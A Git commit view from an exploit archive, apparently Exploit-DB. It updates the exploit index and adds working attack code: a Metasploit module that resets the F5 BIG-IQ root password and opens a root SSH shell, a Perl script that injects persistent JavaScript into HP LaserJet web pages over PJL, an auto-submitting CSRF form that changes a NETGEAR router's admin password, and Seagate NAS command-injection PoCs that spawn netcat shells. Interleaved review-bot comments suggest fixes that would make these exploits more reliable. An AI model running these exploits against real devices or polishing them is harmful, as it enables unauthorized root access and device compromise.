Updated 05_04_2014

Offensive Security 2014-05-04 04:36:23 +00:00
parent 36d3a5ce9d
commit 658e0cae3f
25 changed files with 1553 additions and 1 deletions

View file

@ -8585,7 +8585,7 @@ id,file,description,date,author,platform,type,port
9101,platforms/php/webapps/9101.txt,"phpbms 0.96 Multiple Vulnerabilities",2009-07-10,eLwaux,php,webapps,0
9102,platforms/windows/dos/9102.pl,"PatPlayer 3.9 (M3U File) Local Heap Overflow PoC",2009-07-10,Cyber-Zone,windows,dos,0
9103,platforms/php/webapps/9103.txt,"gencms 2006 Multiple Vulnerabilities",2009-07-10,eLwaux,php,webapps,0
9104,platforms/windows/local/9104.py,"Photo DVD Maker Pro <= 8.02 (.pdm) Local BOF Exploit (SEH)",2009-07-10,His0k4,windows,local,0
9104,platforms/windows/local/9104.py,"Photo DVD Maker Pro <= 8.02 - (.pdm) Local BOF Exploit (SEH)",2009-07-10,His0k4,windows,local,0
9105,platforms/php/webapps/9105.txt,"MyMsg 1.0.3 (uid) Remote SQL Injection Vulnerability",2009-07-10,Monster-Dz,php,webapps,0
9106,platforms/windows/remote/9106.txt,"citrix xencenterweb (xss/sql/rce) Multiple Vulnerabilities",2009-07-10,"Secure Network",windows,remote,0
9107,platforms/php/webapps/9107.txt,"Phenotype CMS 2.8 (login.php user) Blind SQL Injection Vulnerability",2009-07-10,IRCRASH,php,webapps,0
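Review bot: the only change in this hunk is the " - " separator inserted into the 9104 description, while the entries right next to it in the same hunk (9102 "PatPlayer 3.9 (M3U File) Local Heap Overflow PoC", 9105 "MyMsg 1.0.3 (uid) Remote SQL Injection Vulnerability") keep the unseparated form; if this is a normalisation pass, apply it to the whole hunk, and if 9104 is a one-off fix, the commit message should say why only that row moves.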
@ -29734,6 +29734,7 @@ id,file,description,date,author,platform,type,port
32987,platforms/multiple/remote/32987.txt,"Woodstock 4.2 404 Error Page Cross Site Scripting Vulnerability",2009-05-05,DSecRG,multiple,remote,0
32988,platforms/php/webapps/32988.txt,"VerliAdmin 0.3 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-05-05,TEAMELITE,php,webapps,0
32989,platforms/php/webapps/32989.txt,"Verlihub Control Panel 1.7 Multiple Cross-Site Scripting Vulnerabilities",2009-05-06,TEAMELITE,php,webapps,0
32990,platforms/hardware/webapps/32990.pl,"HP Laser Jet - JavaScript Persistent XSS via PJL Directory Traversal",2014-04-23,@0x00string,hardware,webapps,0
32991,platforms/php/webapps/32991.txt,"Claroline 1.8.11 'claroline/linker/notfound.php' Cross-Site Scripting Vulnerability",2009-05-08,"Gerendi Sandor Attila",php,webapps,0
32992,platforms/php/webapps/32992.txt,"MagpieRSS 0.72 Cross Site Scripting And HTML Injection Vulnerabilities",2009-05-08,"Justin Klein Keane",php,webapps,0
32993,platforms/php/webapps/32993.txt,"Dacio's Image Gallery 1.6 Multiple Remote Vulnerabilities",2009-05-11,ahmadbady,php,webapps,0
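Review bot: the new 32990 row is typed hardware,webapps with port 0, but the script it indexes talks raw PJL to TCP 9100 (PeerPort => '9100' in 32990.pl) and never touches the embedded web server over HTTP; the persistent XSS is the outcome, the delivery is a PJL file-system write. hardware,remote with port 9100 would match how the SonicWALL entry 33016 in this same file is classified and would make the row findable by port. The description's "HP Laser Jet" also differs from the vendor spelling "LaserJet" that 32990.pl uses in its own Version line.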
@ -29762,6 +29763,7 @@ id,file,description,date,author,platform,type,port
33016,platforms/hardware/remote/33016.txt,"SonicWALL SSL-VPN 'cgi-bin/welcome/VirtualOffice' Remote Format String Vulnerability",2009-05-29,"Patrick Webster",hardware,remote,0
33017,platforms/linux/dos/33017.txt,"Adobe Acrobat <= 9.1.3 - Stack Exhaustion Denial of Service Vulnerability",2009-05-29,"Saint Patrick",linux,dos,0
33018,platforms/windows/dos/33018.txt,"cFos Personal Net 3.09 - Remote Heap Memory Corruption Denial of Service",2014-04-25,LiquidWorm,windows,dos,0
33019,platforms/multiple/webapps/33019.txt,"miSecureMessages 4.0.1 - Session Management & Authentication Bypass Vulnerabilities",2014-04-25,"Jared Bird",multiple,webapps,0
33020,platforms/linux/dos/33020.py,"CUPS <= 1.3.9 'cups/ipp.c' NULL Pointer Dereference Denial Of Service Vulnerability",2009-06-02,"Anibal Sacco",linux,dos,0
33021,platforms/php/webapps/33021.txt,"PHP-Nuke 8.0 Downloads Module 'query' Parameter Cross Site Scripting Vulnerability",2009-06-02,"Schap Security",php,webapps,0
33022,platforms/php/webapps/33022.txt,"Joomla! Prior to 1.5.11 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2009-06-03,"Airton Torres",php,webapps,0
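Review bot: 33019 is filed as multiple,webapps,0, yet the PoCs in 33019.txt target /msmwebservice/service.asmx, an ASP.NET web service, so the server side is a single platform; if "multiple" is meant to cover the iOS and Android clients, the description should say the finding is server-side and the platform should follow the server. The port should also be set (the advisory's requests are plain HTTP to the server host), since 0 here means "not applicable" for every other webapps row.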
@ -29874,3 +29876,25 @@ id,file,description,date,author,platform,type,port
33134,platforms/linux/dos/33134.txt,"Adobe Flash Player <= 10.0.22 and AIR - 'intf_count' Integer Overflow Vulnerability",2009-07-30,"Roee Hay",linux,dos,0
33136,platforms/hardware/webapps/33136.txt,"Fritz!Box - Remote Command Execution Exploit",2014-05-01,0x4148,hardware,webapps,0
33138,platforms/hardware/webapps/33138.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Stored XSS Vulnerability",2014-05-01,"Dolev Farhi",hardware,webapps,0
33141,platforms/php/remote/33141.rb,"AlienVault OSSIM SQL Injection and Remote Code Execution",2014-05-02,metasploit,php,remote,443
33142,platforms/multiple/remote/33142.rb,"Apache Struts ClassLoader Manipulation Remote Code Execution",2014-05-02,metasploit,multiple,remote,8080
33143,platforms/hardware/remote/33143.rb,"F5 BIG-IQ 4.1.0.2013.0 - Privilege Escalation",2014-05-02,"Brandon Perry",hardware,remote,443
33144,platforms/php/webapps/33144.txt,"Censura Prior to 2.1.1 Multiple Cross Site Scripting Vulnerabilities",2009-06-29,mark99,php,webapps,0
33145,platforms/linux/local/33145.c,"PHP Fuzzer Framework Default Location Insecure Temporary File Creation Vulnerability",2009-08-03,"Melissa Elliott",linux,local,0
33146,platforms/php/webapps/33146.txt,"CS-Cart 2.0.5 'reward_points.post.php' SQL Injection Vulnerability",2009-08-04,"Ryan Dewhurst",php,webapps,0
33147,platforms/php/webapps/33147.txt,"AJ Auction Pro 3.0 'txtkeyword' Parameter Cross Site Scripting Vulnerability",2009-08-05,"599eme Man",php,webapps,0
33148,platforms/linux/dos/33148.c,"Linux Kernel 2.6.x 'posix-timers.c' NULL Pointer Dereference Denial of Service Vulnerability",2009-08-06,"Hiroshi Shimamoto",linux,dos,0
33149,platforms/php/webapps/33149.txt,"Alkacon OpenCms 7.x Multiple Input Validation Vulnerabilities",2009-08-06,"Katie French",php,webapps,0
33150,platforms/hardware/webapps/33150.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - CSRF Vulnerability",2014-05-03,"Dolev Farhi",hardware,webapps,0
33152,platforms/php/webapps/33152.txt,"PhotoPost PHP 3.3.1 'cat' Parameter Cross Site Scripting and SQL Injection Vulnerabilities",2009-08-07,"599eme Man",php,webapps,0
33153,platforms/php/webapps/33153.txt,"SupportPRO SupportDesk 3.0 'shownews.php' Cross Site Scripting Vulnerability",2009-08-10,Moudi,php,webapps,0
33154,platforms/php/webapps/33154.txt,"SQLiteManager 1.2 'main.php' Cross Site Scripting Vulnerability",2009-08-10,"Hadi Kiamarsi",php,webapps,0
33155,platforms/php/webapps/33155.txt,"ViArt CMS forums.php category_id Parameter XSS",2009-08-10,Moudi,php,webapps,0
33156,platforms/php/webapps/33156.txt,"Crime24 Stealer Panel 1.0 - Multiple Vulnerabilities",2014-05-03,"Daisuke Dan",php,webapps,0
33157,platforms/php/webapps/33157.txt,"ViArt CMS forum.php forum_id Parameter XSS",2009-08-10,Moudi,php,webapps,0
33158,platforms/php/webapps/33158.txt,"ViArt CMS forum_topic_new.php forum_id Parameter XSS",2009-08-10,Moudi,php,webapps,0
33159,platforms/hardware/webapps/33159.txt,"Seagate BlackArmor NAS - Multiple Vulnerabilities",2014-05-03,"Shayan S",hardware,webapps,0
33160,platforms/php/webapps/33160.txt,"Papoo 3.x Upload Images Arbitrary File Upload Vulnerability",2009-08-10,"RedTeam Pentesting GmbH",php,webapps,0
33161,platforms/php/local/33161.php,"PHP 5.3 'mail.log' Configuration Option 'open_basedir' Restriction Bypass Vulnerability",2009-08-10,"Maksymilian Arciemowicz",php,local,0
33162,platforms/php/remote/33162.php,"PHP 5.2.10/5.3 'ini_restore()' Memory Information Disclosure Vulnerability (1)",2009-08-10,"Maksymilian Arciemowicz",php,remote,0
33163,platforms/php/remote/33163.php,"PHP 5.2.10/5.3 'ini_restore()' Memory Information Disclosure Vulnerability (2)",2009-08-10,"Maksymilian Arciemowicz",php,remote,0
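Review bot: 33143 is filed as hardware,remote, but the module it points to declares 'Platform' => ['unix'], its sample output shows it living at exploit/linux/http/f5_bigiq_passwd_update, and its Name reads "authenticated arbitrary user password change" where this row says "Privilege Escalation"; pick one platform string and one description so the index and the module agree. Two smaller things in the same hunk: the id sequence skips 33135, 33137, 33139, 33140 and 33151 (fine if those are held back, but nothing in the commit says so), and 33148's "Linux Kernel 2.6.x" could be narrowed to the 2.6.28-rc1 to 2.6.31-rc5 window that 33148.c itself states in its header.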


View file

@ -0,0 +1,235 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'json'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "F5 BIG-IQ v4.1.0.2013.0 authenticated arbitrary user password change",
'Description' => %q{
F5 BIG-IQ v4.1.0.2013.0 is vulnerable to a privilege escalation attack which allows
an attacker to change the root users password. This module does just this, then SSH's in.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Brandon Perry <bperry.volatile@gmail.com>'
],
'References' =>
[
['URL', 'http://volatile-minds.blogspot.com/2014/05/f5-big-iq-v41020130-authenticated.html']
],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' =>
[
['BIG-IQ 4.1.0.2013.0', {}]
],
'Privileged' => true,
'DefaultOptions' =>
{
'SSL' => true,
'ExitFunction' => "none"
},
'Payload' =>
{
'Compat' => {
'PayloadType' => 'cmd_interact',
'ConnectionType' => 'find'
}
},
'DisclosureDate' => "Sep 23 2013",
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(443),
OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']),
OptString.new('USERNAME', [true, 'The user to authenticate as.', 'username']),
OptString.new('PASSWORD', [true, 'The password to authenticate with.', 'password']),
OptString.new('ADMINISTRATOR', [true, 'The administrator to spoof for privilege escalation', 'root']),
OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
], self.class)
end
def exploit
post = {
'username' => datastore['USERNAME'],
'passwd' => datastore['PASSWORD']
}
print_status("Authenticating as " + datastore['USERNAME'])
#Simple post to get us a cookie so we can change our password
res = send_request_cgi({
'method' => 'POST',
'uri' => '/ui/actions/logmein.html',
'vars_post' => post
})
if res.headers["Location"] != "/"
fail_with("Authentication failed")
end
cookie = res.get_cookies
#this gets turned into JSON
#
#generation will be set in try_generation if it isn't correct
#
#This is also the attempt at privilege escalation, so we preserve the password
post = {
"name" => datastore['ADMINISTRATOR'],
"displayName" => "fdsa",
"generation" => 1,
"lastUpdateMicros" => 1395360806678747,
"kind" => "shared:authz:users:usersworkerstate",
"selfLink" => "https://localhost/mgmt/shared/authz/users/" + datastore['USERNAME'],
"password" => datastore['PASSWORD'],
"password2" => datastore['PASSWORD'],
"state" => "ACTIVE"
}
print_status("Escalating privileges to that of " + datastore["ADMINISTRATOR"])
try_generation(post, cookie, '/mgmt/shared/authz/users/' + datastore['USERNAME'])
password = Rex::Text.rand_text_alpha(rand(32)+5)
#this is when we change the password for the root user
post = {
"name" => "root",
"displayName" => "root",
"generation" => 1,
"lastUpdateMicros" => 1395359570236413,
"kind" => "shared:authz:users:usersworkerstate",
"selfLink" => "https://localhost/mgmt/shared/authz/users/root",
"password" => password,
"password2" => password,
"state" => "ACTIVE"
}
select(nil,nil,nil,5)
print_status("Changing root user password to " + password)
try_generation(post, cookie, '/mgmt/shared/authz/users/root')
res = do_login('root', password)
if res
print_good("Login Successful with 'root:#{password}'")
handler(res.lsock)
end
end
def try_generation(put, cookie, uri)
done = false
while !done
res = send_request_cgi({
'method' => "PUT",
'uri' => uri,
'data' => put.to_json,
'cookie' => cookie
})
if res and res.body =~ /Invalid generation/
put['generation'] = /Need (\d{1,9}), received \d{1,9}/.match(res.body)[1]
elsif res and res.body =~ /encryptedPassword/
done = true
else
fail_with("Didn't get a response that I expected")
end
end
end
def do_login(user, pass)
opts = {
:auth_methods => ['password', 'keyboard-interactive'],
:msframework => framework,
:msfmodule => self,
:port => 22,
:disable_agent => true,
:config => true,
:password => pass,
:record_auth_info => true,
:proxies => datastore['Proxies']
}
opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
begin
ssh = nil
ssh = Net::SSH.start(datastore['RHOST'], user, opts)
rescue Rex::ConnectionError, Rex::AddressInUse
return nil
rescue Net::SSH::Disconnect, ::EOFError
print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
return nil
rescue ::Timeout::Error
print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
return nil
rescue Net::SSH::AuthenticationFailed
print_error "#{rhost}:#{rport} SSH - Failed authentication"
return nil
rescue Net::SSH::Exception => e
print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
return nil
end
if ssh
conn = Net::SSH::CommandStream.new(ssh, '/bin/sh', true)
return conn
end
return nil
end
end
__END__
msf exploit(f5_bigiq_passwd_update) > show options
Module options (exploit/linux/http/f5_bigiq_passwd_update):
Name Current Setting Required Description
---- --------------- -------- -----------
ADMINISTRATOR root yes The administrator to spoof for privilege escalation
PASSWORD notpassword yes The password to authenticate with.
Proxies no Use a proxy chain
RHOST 192.168.1.8 yes The target address
RPORT 443 yes The target port
SSH_TIMEOUT 30 no Specify the maximum time to negotiate a SSH session
TARGETURI / yes The URI of the vulnerable instance
USERNAME username yes The user to authenticate as.
VHOST no HTTP server virtual host
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 a
msf exploit(f5_bigiq_passwd_update) > exploit
[+] Login Successful with 'root:qBvBY'
[*] Found shell.
[*] Command shell session 3 opened (192.168.1.31:58165 -> 192.168.1.8:22) at 2014-03-20 21:18:09 -0500
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=root:system_r:unconfined_t:SystemLow-SystemHigh
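Review bot: res.headers["Location"] is dereferenced right after the login POST without checking res, so a closed port or a timeout raises NoMethodError instead of reaching fail_with; guard it with `unless res && res.headers['Location'] == '/'`. Three option mismatches in the same file: SSH_TIMEOUT is registered but do_login never passes it to Net::SSH.start (there is no :timeout in opts), SSH_DEBUG is read via datastore['SSH_DEBUG'] but never registered, and TARGETURI is registered but both request paths ('/ui/actions/logmein.html' and '/mgmt/shared/authz/users/') are hard-coded rather than built with normalize_uri(target_uri.path, ...). In try_generation the value captured from /Need (\d{1,9}), received \d{1,9}/ is a String, so the retried PUT serialises "generation":"N" as a JSON string where the first attempt sent an integer; call .to_i before assigning it. Minor: the __END__ sample output lists the target as "0 a" while the Targets table names it 'BIG-IQ 4.1.0.2013.0', the DisclosureDate "Sep 23 2013" predates the only reference (a May 2014 blog post) with no explanation, and the header URL reads http//metasploit.com.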

View file

@ -0,0 +1,256 @@
#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket::INET;
my $host = $ARGV[0];
# Exploit Title: HP Laser Jet Persistent Javascript Cross Site Scripting via PJL
# Google Dork: n/a
# Date: 4/22/14
# Exploit Author: @0x00string
# Vendor Homepage: http://www.hp.com/products1/laserjetprinters/
# Software Link: n/a
# Version: HP LaserJet P/M xxxx (LaserJets with network conectivity, PJL and onboard storage)
# Tested on: P4015n, P2035n, P4014, M3035 MFP, CP 3525, etc.
# CVE : CVE-2010-4107,
# This script will infect all pages on HP laserjets which include ews_functions.js by appending javascript to the ews_functions.js file by leveraging the PJL Directory Traversal
print "\t _______ __ __ _______ _______ _______ _______ ______ ___ __ _ _______
\t| _ || |_| || _ || _ || || || _ | | | | | | || |
\t| | | || || | | || | | || _____||_ _|| | || | | | |_| || ___|
\t| | | || || | | || | | || |_____ | | | |_||_ | | | || | __
\t| |_| | | | | |_| || |_| ||_____ | | | | __ || | | _ || || |
\t| || _ || || | _____| | | | | | | || | | | | || |_| |
\t|_______||__| |__||_______||_______||_______| |___| |___| |_||___| |_| |__||_______|
\t HP Laser Jet persistent Javascript XSS
\t via PJL Dir Trav\n\n";
$| = 1;
infect($host);
sub infect {
my $co = 0;
my (@returned, $temp, @files, @sizes, $size, $data);
my $socket = new IO::Socket::INET (
PeerHost => $host,
PeerPort => '9100',
Proto => 'tcp',
) or die $!;
if ($socket) {
$data =
"\x1b\x25\x2d\x31\x32".
"\x33\x34\x35\x58\x40".
"\x50\x4a\x4c\x20\x46".
"\x53\x44\x49\x52\x4c".
"\x49\x53\x54\x20\x4e".
"\x41\x4d\x45\x20\x3d".
"\x20\x22\x30\x3a\x5c".
"\x5c\x77\x65\x62\x53".
"\x65\x72\x76\x65\x72".
"\x5c\x5c\x68\x6f\x6d".
"\x65\x5c\x5c\x6a\x73".
"\x66\x69\x6c\x65\x73".
"\x5c\x5c\x22\x20\x45".
"\x4e\x54\x52\x59\x3d".
"\x31\x20\x43\x4f\x55".
"\x4e\x54\x3d\x39\x39".
"\x39\x0a\x0d\x1b\x25".
"\x2d\x31\x32\x33\x34\x35\x58";
#print "\n$data\n";
$socket = tx($socket, $data);
($socket, $temp) = rx($socket);
#print "\n$temp\n";
@returned = split('\n', $temp);
foreach(@returned) {
if ($_ =~ /(.*?)\ TYPE\=FILE\ SIZE\=(\d{1,99})/) {
push(@files, $1);
push(@sizes, $2);
}
}
}
my $two = 0;
foreach(@files) {
if ($_ =~ /RestrictColor\.js/ || $_ =~ /ews_functions\.js/) {
$two++;
}
}
if ($two > 1) {
if ($socket) {
while ($co < scalar(@files)) {
if ($files[$co] =~ /ews/) {
$size = $sizes[$co];
$data =
"\x1b\x25\x2d\x31\x32\x33\x34\x35\x58".
"\x40\x50\x4a\x4c\x20\x46\x53\x55\x50".
"\x4c\x4f\x41\x44\x20\x4e\x41\x4d\x45".
"\x20\x3d\x20\x22\x30\x3a\x5c\x5c\x77".
"\x65\x62\x53\x65\x72\x76\x65\x72\x5c".
"\x5c\x68\x6f\x6d\x65\x5c\x5c\x6a\x73".
"\x66\x69\x6c\x65\x73\x5c\x5c\x65\x77".
"\x73\x5f\x66\x75\x6e\x63\x74\x69\x6f".
"\x6e\x73\x2e\x6a\x73\x22\x20\x4f\x46".
"\x46\x53\x45\x54\x3d\x30\x20\x53\x49".
"\x5a\x45\x20\x3d\x20" . $size.
"\x0d\x0a";
}
$co++;
}
$temp = undef;
#print "\n$data\n";
$socket = tx($socket, $data);
$data = undef;
if ($socket) {
($socket, $temp) = rx($socket, $size);
#print "\n$temp\n";
my @original = split('\n', $temp);
$temp = "";
shift(@original);
foreach(@original) {
$temp = $temp . $_ . "\n";
}
#print $temp;
}
}
}
$data =
"\x1b\x25\x2d\x31\x32\x33\x34\x35\x58".
"\x40\x50\x4a\x4c\x20\x46\x53\x41\x50".
"\x50\x45\x4e\x44\x20\x46\x4f\x52\x4d".
"\x41\x54\x3a\x42\x49\x4e\x41\x52\x59".
"\x20\x4e\x41\x4d\x45".
"\x20\x3d\x20\x22\x30\x3a\x5c\x5c\x77".
"\x65\x62\x53\x65\x72\x76\x65\x72\x5c".
"\x5c\x68\x6f\x6d\x65\x5c\x5c\x6a\x73".
"\x66\x69\x6c\x65\x73\x5c\x5c\x65\x77".
"\x73\x5f\x66\x75\x6e\x63\x74\x69\x6f".
"\x6e\x73\x2e\x42\x41\x4b".
"\x22\x20\x53\x49\x5a\x45\x20\x3d\x20".
length($temp) . "\x0d\x0a". $temp.
"\x1b\x25\x2d\x31\x32\x33\x34\x35\x58";
#print $data;
if ($socket) {
#print "\n$data\n";
$socket = tx($socket, $data);
($socket, $temp) = rx($socket);
#print "\n$temp\n";
}
if ($socket) {
$data =
"\x1b\x25\x2d\x31\x32\x33\x34\x35\x58".
"\x40\x50\x4a\x4c\x20\x46\x53\x51\x55".
"\x45\x52\x59\x20\x4e\x41\x4d\x45\x20".
"\x3d\x20\x22\x30\x3a\x5c\x5c\x77\x65".
"\x62\x53\x65\x72\x76\x65\x72\x5c\x5c".
"\x68\x6f\x6d\x65\x5c\x5c\x6a\x73\x66".
"\x69\x6c\x65\x73\x5c\x5c\x65\x77\x73".
"\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e".
"\x73\x2e\x42\x41\x4b\x22\x0d\x0a";
#print "\n$data\n";
$socket = tx($socket, $data);
($socket, $temp) = rx($socket);
#print "\n$temp\n";
exit(0) unless ($temp =~ /ews\_functions\.BAK/);
}
if ($socket) {
my $payload =
"\x76\x61\x72\x20\x65\x78\x70\x6c\x6f".
"\x69\x74\x20\x3d\x20\x64\x6f\x63\x75".
"\x6d\x65\x6e\x74\x2e\x63\x72\x65\x61".
"\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74".
"\x28\x22\x64\x69\x76\x22\x29\x3b\x20".
"\x65\x78\x70\x6c\x6f\x69\x74\x2e\x69".
"\x6e\x6e\x65\x72\x48\x54\x4d\x4c\x20".
"\x3d\x20\x27\x3c\x64\x69\x76\x3e\x3c".
"\x66\x6f\x6e\x74\x20\x73\x69\x7a\x65".
"\x3d\x35\x30\x3e".
"\x41\x41\x41\x41" . "\x3c". # <--- this is being added to the page as an element. put whatever you'd like here, but check your lengths!
"\x2f\x66\x6f\x6e\x74\x3e\x3c\x2f\x64".
"\x69\x76\x3e\x27\x3b\x20\x64\x6f\x63".
"\x75\x6d\x65\x6e\x74\x2e\x67\x65\x74".
"\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42".
"\x79\x54\x61\x67\x4e\x61\x6d\x65\x28".
"\x27\x62\x6f\x64\x79\x27\x29\x5b\x30".
"\x5d\x2e\x61\x70\x70\x65\x6e\x64\x43".
"\x68\x69\x6c\x64\x28\x65\x78\x70\x6c".
"\x6f\x69\x74\x29\x3b";
$data =
"\x1b\x25\x2d\x31\x32\x33\x34\x35\x58".
"\x40\x50\x4a\x4c\x20\x46\x53\x41\x50".
"\x50\x45\x4e\x44\x20\x46\x4f\x52\x4d".
"\x41\x54\x3a\x42\x49\x4e\x41\x52\x59".
"\x20\x4e\x41\x4d\x45\x20\x3d\x22\x30".
"\x3a\x5c\x5c\x77\x65\x62\x53\x65\x72".
"\x76\x65\x72\x5c\x5c\x68\x6f\x6d\x65".
"\x5c\x5c\x6a\x73\x66\x69\x6c\x65\x73".
"\x5c\x5c\x65\x77\x73\x5f\x66\x75\x6e".
"\x63\x74\x69\x6f\x6e\x73\x2e\x6a\x73".
"\x22\x20\x53\x49\x5a\x45\x20\x3d\x20".
length($payload) . "\x0d\x0a". $payload.
"\x1b\x25\x2d\x31\x32\x33\x34\x35\x58";
$socket = tx($socket, $data);
exit(0);
}
}
sub tx {
my $socket = shift;
my $data = shift;
$socket->send($data) or die $!;
return $socket;
}
sub rx {
my $socket = shift;
my $second_size = shift;
unless ($second_size) {
$second_size = 2048;
}
my $data = undef;
eval {
local $SIG{ALRM} = sub { die 'Timed Out'; };
alarm 10;
$socket->recv($data, 2048);
if ($data) {
while (length($data) < (length($data) + $second_size)) {
my $moar;
$socket->recv($moar, length($second_size + 1));
$data = $data . $moar;
}
alarm 0;
return ($socket, $data);
}
};
alarm 0;
return($socket, $data);
}
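Review bot: the read loop in rx() never terminates on its own: `while (length($data) < (length($data) + $second_size))` is true for every positive $second_size, so each call only returns when the 10-second alarm fires and die() unwinds the eval, which makes every exchange with the printer take ten seconds; compare against a target length (`while (length($data) < $second_size)`) or stop on a zero-length recv. In the same loop `length($second_size + 1)` is the character count of the number (4 for 2049), so the socket is drained four bytes per recv. Upstream of that, the `$two > 1` check only guards the FSUPLOAD of ews_functions.js: when fewer than two of RestrictColor.js / ews_functions.js are listed, $temp still holds the FSDIRLIST reply, so the script goes on to write that directory listing into ews_functions.BAK and then appends the payload to ews_functions.js anyway; exit at that point instead. Two style points: every PJL command is spelled as hex escapes ("\x40\x50\x4a\x4c\x20\x46\x53\x44\x49\x52\x4c\x49\x53\x54" is just "@PJL FSDIRLIST"), which hides the protocol from anyone reviewing the script and makes the OFFSET/SIZE arithmetic hard to check, and $host is taken from $ARGV[0] with no usage message when it is missing.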

View file

@ -0,0 +1,58 @@
# Exploit Title: CSRF in NETGEAR DGN2200 Admin panel
# Date 02/05/2014
# Exploit author: Dolev Farhi @f1nhack
# Vendor homepage: http://netgear.com
# Affected Firmware version: 1.0.0.29_1.7.29_HotS
# Affected Hardware: NETGEAR DGN2200 Wireless ADSL Router
Summary
=======
A CSRF Attack was discovered in the Admin panel of NETGEAR DGN2200 Router.
Vulnerability Description
=========================
Cross Site Request Forgery attack (CSRF)
PoC
====
POST /password.cgi HTTP/1.1
Host: 10.0.0.138
Proxy-Connection: keep-alive
Content-Length: 122
Cache-Control: max-age=0
Authorization: Basic QWRtaW46VG9vbGJveDEj
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://10.0.0.138
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://10.0.0.138/PWD_password.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
sysOldPasswd=OLDPASS&sysNewPasswd=NEWPASS&sysConfirmPasswd=NEWPASS&authTimeout=5&cfAlert_Apply=Apply
Exploit
=========
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to change Admin password</H2>
<form method="POST" name="form0" action="http://10.0.0.138/password.cgi">
<input type="hidden" name="sysOldPasswd" value="OLDPASS"/>
<input type="hidden" name="sysNewPasswd" value="NEWPASS"/>
<input type="hidden" name="sysConfirmPasswd" value="NEWPASS"/>
<input type="hidden" name="authTImeout" value="5"/>
<input type="hidden" name="cfAlert_Apply" value="Apply"/>
</form>
</body>
</html>
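Review bot: the hidden field in the exploit form is named authTImeout (capital I) while the captured request sends authTimeout; a strict handler will drop or reject the unknown name, so match the case in the PoC. Two preconditions the write-up should state up front: the victim's browser must still hold the router's HTTP Basic credentials (the captured request carries an Authorization: Basic header, and a cross-origin form submission cannot add one, it can only cause the browser to replay cached credentials), and the attacker must already know the current password because sysOldPasswd is a required field in the request; without both, the auto-submitted POST does nothing, so the realistic impact is limited to default or previously leaked passwords.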

View file

@ -0,0 +1,50 @@
# Exploit Title: Seagate BlackArmor NAS Multiple Vulnerabilities
# Date: 2/17/14
# Exploit Author: Shayan Sadigh (twitter.com/r1pplex) | <ienjoy.ripples@gmail.com>
# Vendor Homepage: http://www.seagate.com/external-hard-drives/network-storage/
# Version: All BlackArmor NAS devices..
# Tested on: Linux
# CVE : N/A
1. some sort of backdoor user (hardcoded credentials) in backupmgt/pre_connect_check.php
$password = '!~@#$EW#$$%FREDESWWSED';
/////////////////////////////////////////////////////////////////////////////////////////////////////////
2. remote [root] code execution, this software is riddled with many many bugs, including tons of rce..
examples: localhost/backupmgt/localJob.php
Vulnerable code:
$session = $_GET["session"];
$tempsrc = exec("cat $immedLog | grep $session | cut -d '".Chr(002)."' -f 3");
$des = exec("cat $immedLog | grep $session | cut -d '".Chr(002)."' -f 4");
PoC: curl "localhost/backupmgt/localJob.php?session=fail;nc -e 127.0.0.1 99;"
-------------------------
listening on [any] 99 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 57157
id
uid=0(root) gid=0(root)
another example: localhost/backupmgmt/pre_connect_check.php
Vulnerable code:
$ipString = $_GET["server_ip"];
$auth_name = $_GET["auth_name"];
$password = $_GET["auth_pass"];
$alias_name = $_GET["alias_name"];
$dryString ="rsync -rnP --password-file=temp.pas"." --log-file=pre.log --contimeout=5 /usr/sbin ".$auth_name."@".$ipString."::".$alias_name;
$result =@exec ($dryString); // produce temp pre log
PoC: curl "localhost/backupmgt/pre_connect_check.php?auth_name=fail;nc -e 127.0.0.1 99;"
-------------------------
listening on [any] 99 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 52348
id
uid=0(root) gid=0(root)
There's ton of more bugs in BlackArmor NAS software, there have been other releases noting other bugs (killProcesses.php RCE), Seagate has decided to ignore any messages regarding these..claiming they are only working on newer products now.
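Review bot: both PoC command lines inject `nc -e 127.0.0.1 99`, but -e takes the program to execute, not a host, so as written netcat tries to run "127.0.0.1" and connects nowhere; the listener transcript shows a connection did arrive, so the command that was actually run should be the one quoted (`nc 127.0.0.1 99 -e /bin/sh` is the traditional-netcat form). The second path is inconsistent as well: the prose says backupmgmt/pre_connect_check.php while the curl line (and item 1) use backupmgt/. Item 1 shows only a `$password` literal; to call it a backdoor user the write-up needs the username it is paired with and the check that consumes it, otherwise call it a hard-coded credential. "Version: All BlackArmor NAS devices" is asserted without a tested firmware version, and "Tested on: Linux" names the OS rather than the device; give the model and firmware that produced the uid=0 output.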

platforms/linux/dos/33148.c Executable file
View file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/35976/info
